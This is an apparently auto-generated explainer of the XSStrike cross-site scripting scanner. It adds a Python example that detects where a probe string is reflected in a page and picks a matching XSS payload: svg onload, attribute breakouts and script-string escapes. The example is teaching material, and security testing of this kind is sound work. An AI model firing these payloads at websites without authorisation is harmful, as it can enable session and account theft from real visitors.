explaingit

s0md3v/xsstrike

14,947 stars · Python

TLDR

XSStrike is a command-line tool, written in Python, for finding cross-site scripting bugs in websites.


In plain English

XSStrike is a command-line tool, written in Python, for finding cross-site scripting bugs in websites. Cross-site scripting, usually shortened to XSS, is a class of web security flaw in which attacker-controlled input is rendered into a page in a way that makes the attacker's JavaScript run inside another visitor's browser. XSStrike is aimed at security testers and bug bounty researchers who want to check whether a target site has this kind of flaw.

The project describes itself as a detection suite rather than just a scanner. The README's main pitch is that most XSS tools work by firing a long list of fixed payloads at a site and watching for them to appear in the response. XSStrike instead reads the response with four hand-written parsers, works out the HTML or JavaScript context in which user input lands, and then has a payload generator and a fuzzing engine build attack strings tailored to that context. That distinction matters because the same reflected input has to escape different contexts differently: a payload that works as plain HTML text does nothing inside a quoted attribute value or a JavaScript string, where the surrounding quote has to be closed first. The README shows several example payloads it generates, which look like deliberately obfuscated HTML and JavaScript snippets.

The feature list in the README covers scanning for both reflected XSS and DOM XSS, a multi-threaded crawler that walks a target site, the parsing and context analysis described above, detection and evasion of Web Application Firewalls, scanning for outdated JavaScript libraries on the site, a payload-encoding step, a brute-force mode that reads payloads from a file, blind XSS support, and discovery of hidden URL parameters. Some of these capabilities come from sibling projects by the same author that XSStrike pulls in: Photon for crawling, Zetanize for form parsing, and Arjun for parameter discovery.

Installation is described in three terminal commands: clone the repository, change directory into it, and install the Python dependencies with pip. After that the tool is run as python xsstrike.py.

The README points readers at the project wiki for proper usage instructions, a compatibility and dependencies page, and an FAQ that covers questions such as the false positive rate, why the author calls this the most advanced XSS detection suite, and how to reuse the code in other software. A gallery embeds screenshots showing the tool finding DOM and reflected XSS, crawling, fuzzing, and brute forcing from a payload file. The project is released under the GNU GPL version 3. The README credits two outside sources: the WAF signatures are taken from the sqlmap project, and one plugin is a modified version of retirejslib.
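To make the "analyse the context, then shape the payload" idea concrete, here is an added example in Python. It is not XSStrike's code and does not reproduce its parsers; it is a small stand-in built on the standard library's HTMLParser that classifies where an assumed probe string (here the made-up marker `xsSt3st`) is reflected in a response and picks a payload that escapes that context. The sample responses, the marker, the quote-tracking lexer and the `alert(1)` payloads are all constructed for the illustration.

```python
"""Context-aware XSS payload selection (added illustration, not XSStrike's code).

Idea: a probe string is sent in a parameter, the response is parsed, and the
context in which the probe is reflected decides which payload is tried next.
"""
import re
from html.parser import HTMLParser

# Hypothetical alphanumeric probe we pretend was sent in a query parameter.
# Alphanumeric so HTML-encoding cannot mangle it and the parser cannot split it.
MARKER = "xsSt3st"

RCDATA = ("title", "textarea")  # tags whose body is text, never parsed as markup


class _Finder(HTMLParser):
    """Records every context in which the marker is reflected."""

    def __init__(self, marker):
        super().__init__(convert_charrefs=False)
        self.marker, self.found = marker, []
        self._script, self._rcdata = False, None

    def handle_starttag(self, tag, attrs):
        raw = self.get_starttag_text() or ""
        for name, value in attrs:
            if value and self.marker in value:
                self.found.append({"context": "attribute", "tag": tag,
                                   "attr": name, "quote": _attr_quote(raw, name)})
        if tag == "script":
            self._script = True
        elif tag in RCDATA:
            self._rcdata = tag

    def handle_endtag(self, tag):
        if tag == "script":
            self._script = False
        elif tag == self._rcdata:
            self._rcdata = None

    def handle_data(self, data):
        if self.marker not in data:
            return
        if self._script:
            self.found.append({"context": "script", "quote": _js_quote(data, self.marker)})
        elif self._rcdata:
            self.found.append({"context": "rcdata", "tag": self._rcdata})
        else:
            self.found.append({"context": "html"})

    def handle_comment(self, data):
        if self.marker in data:
            self.found.append({"context": "comment"})


def _attr_quote(raw_tag, name):
    """Quote character wrapping attribute `name` in the raw tag text ('' if unquoted)."""
    m = re.search(r'(?<![\w-])' + re.escape(name) + r'\s*=\s*(["\']?)', raw_tag, re.I)
    return m.group(1) if m else ""


def _js_quote(code, marker):
    """Tiny string-state lexer: which quote (if any) is open where the marker sits."""
    quote, i, end = "", 0, code.find(marker)
    while i < end:
        ch = code[i]
        if quote:
            if ch == "\\":
                i += 1          # skip the escaped character
            elif ch == quote:
                quote = ""
        elif ch in "'\"`":
            quote = ch
        i += 1
    return quote


def payload_for(ctx):
    """Pick a payload that first escapes the reflection context, then runs JavaScript."""
    kind, q = ctx["context"], ctx.get("quote", "")
    if kind == "html":
        return "<svg onload=alert(1)>"
    if kind == "comment":
        return "--><svg onload=alert(1)>"
    if kind == "rcdata":
        return f"</{ctx['tag']}><svg onload=alert(1)>"
    if kind == "attribute":
        # Quoted: close the value and the tag. Unquoted: a space starts a new attribute.
        return f"{q}><svg onload=alert(1)>" if q else " onmouseover=alert(1) x="
    if kind == "script":
        # Inside a string: end it, run code, reopen it so the statement still parses.
        return f"{q}-alert(1)-{q}" if q else "alert(1)"
    raise ValueError(kind)


def suggest(body, marker=MARKER):
    """One dict per reflection of `marker` in `body`: context plus a matching payload."""
    finder = _Finder(marker)
    finder.feed(body)
    finder.close()
    return [dict(ctx, payload=payload_for(ctx)) for ctx in finder.found]


if __name__ == "__main__":
    # Constructed sample responses, each reflecting the probe in a different place.
    for body in ['<p>Results for xsSt3st</p>',
                 '<input type="text" name="q" value="xsSt3st">',
                 '<input value=xsSt3st>',
                 '<script>var q = "xsSt3st";</script>',
                 '<title>xsSt3st</title>',
                 '<!-- debug: xsSt3st -->']:
        for hit in suggest(body):
            print(f"{body!r:48} {hit['context']:10} -> {hit['payload']}")
```

A real tool does much more on top of this skeleton: it also probes which special characters survive the server's encoding, handles `javascript:` URLs in `href`/`src`, varies and encodes payloads to slip past a WAF, and confirms execution rather than trusting that a payload string came back intact.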


Generated 2026-05-21 · Model: sonnet-4-6 · Verify against the repo before relying on details.